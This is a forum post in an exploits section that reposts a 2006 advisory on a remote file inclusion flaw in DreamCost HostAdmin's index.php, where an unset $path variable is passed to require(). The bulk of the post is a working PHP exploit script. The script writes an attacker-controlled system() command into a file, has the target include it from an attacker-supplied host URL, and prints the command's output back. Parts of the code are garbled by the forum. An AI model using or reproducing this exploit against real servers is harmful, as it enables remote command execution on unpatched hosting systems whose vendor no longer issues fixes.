Jump to content
DS

Host Admin

By DS, in Exploituri

Recommended Posts

DS Newbie

DS

Posted
Posted

=======================================================================================

HostAdmin - Remote Command Execution Vulnerability

=======================================================================================

http://www.xorcrew.net/

http://www.xorcrew.net/ReZEN

=======================================================================================

:: Summary

Vendor : DreamCost

Vendor Site : http://www.dreamcost.com/

Product(s) : HostAdmin - Automated Hosting Suite

Version(s) : All

Severity : Medium/High

Impact : Remote Command Execution

Release Date : 2/11/2006

Credits : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

By creating a product that integrates with the major payment processors, registrars,

and provisioning tools on the market, HostAdmin gives your hosting company the power

to bill and activate hosting accounts in real-time, even while you sleep at night!

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution

in the index.php file. The bug is here on lines 5, 6, and 7:

require("setup.php");

require("functions.php");

require("db.conf");

require($path . "que.php");

require($path . "provisioning_manager.php");

require($path . "registrar_manager.php");

the $path variable is not set prior to being used in the require() function.

The vendor is no longer offering updates for this software.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php

/*

HostAdmin Remote File Inclusion Exploit c0ded by ReZEN

Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf

url: http://www.xorcrew.net/ReZEN

*/

$cmd = $_POST["cmd wrote: ;

$turl = $_POST["turl wrote: ;

$hurl = $_POST["hurl wrote: ;

$form= "<form method="post" action="".$PHP_SELF."">"

."turl:

<input type="text" name="turl" size="90" value="".$turl."">

"

."hurl:

<input type="text" name="hurl" size="90" value="".$hurl."">

"

."cmd:

<input type="text" name="cmd" size="90" value="".$cmd."">

"

."<input type="submit" value="Submit" name="submit">"

."</form><HR WIDTH="650" ALIGN="LEFT">";

if (!isset($_POST['submit']))

{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system("echo ++BEGIN++"); system("".$cmd."");

system("echo ++END++"); ?>");

fclose($file);

$file = fopen ($turl.$hurl, "r");

if (!$file) {

echo "

Unable to get output.n";

exit;

}

echo $form;

while (!feof ($file)) {

$line .= fgets ($file, 1024)."

";

}

$tpos1 = strpos($line, "++BEGIN++");

$tpos2 = strpos($line, "++END++");

$tpos1 = $tpos1+strlen("++BEGIN++");

$tpos2 = $tpos2-$tpos1;

$output = substr($line, $tpos1, $tpos2);

echo $output;

}

?>

------END------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...